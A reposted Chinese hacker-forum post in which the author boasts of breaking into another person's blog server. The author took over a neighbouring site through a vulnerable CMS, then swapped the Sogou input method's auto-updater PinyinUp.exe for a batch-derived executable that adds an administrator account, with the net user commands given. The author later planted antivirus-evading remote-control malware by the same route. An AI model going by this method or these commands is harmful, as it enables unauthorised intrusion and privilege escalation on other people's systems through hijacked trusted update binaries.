[转载]利用搜狗入侵提权

前两天检测一个牛人的博客

起因是因为我觊觎很久的网站 扔给他几分钟就搞定了 郁闷

后来我就看到他的博客

貌似z-blog 前几次搞到几个牛人的数据库 还是进不去 没有办法

TCL (太菜了)

所以看看旁站 旁站还很有几个

后来利用良精系统的拿到一个旁站

良精那套系统不晓得害了多少无辜的网站 呵呵

上去一看 ws被删了

网站目录命名也没有规则

而且要是能直接跨过去那就不是牛人能干的事情了

传.net 也打不开

貌似php也没有办法

哎到了这里 可怎么办啊

后来乱浏览 可能是运气来了 进了搜狗的目录

一般是安装在 program files\SogouInput

依次往下点 能进去 一不小心新建文件 居然新建成功

心中窃喜

安装搜狗的朋友不晓得有没有注意 是不是经常有个绿色的东西跳出来

没错 那就是搜狗的升级程序 一般都是自己升级的 文件名PinyinUp.exe

到了这里大家都应该知道怎么做了吧

我在本机试验了一下 自己制作过bat 文件

net user goingta www.hackcheese.cn /add
net user localgroup administrators goingta /add

然后把bat转为exe 改名为PinyinUp.exe 替换到自己的电脑上

像朋友要了个免杀的pc 生成的文件改成PinyinUp.exe 然后替换服务器的

替换之前请备份好PinyinUp.exe

这里我为什么要在自己电脑替换呢

这样可以实时了解搜狗什么时候更新 呵呵

剩下的就是等待了

第二天 我的电脑上突然弹出了一个cmd然后消失

呵呵 激动 高兴之余 在cmd下输入 net user 果然命令添加成功了

马上弄下端口转发 看下我的pc里面

没有上线 哎 心凉了 上旁站的shell 去看 我的PinyinUp.exe 还存在 因为大小的原因

我确定我的pc还没有运行

那就继续等吧 我把自己在电脑上的账户上了

第三天开我电脑的时候 又需要输入密码

呵呵又更新了一次吧 这个搜狗更新真的挺勤奋的

于是上webshell去看 我的PinyinUp.exe不见了

不见了是好事

打开pc端口转发下

果然上线了

哎 终于等到你了。。。。。。。

就这样 这个服务器就沦陷了 牛人博客也就这样被检测

作者:goingta
论坛:http://www.hackcheese.cn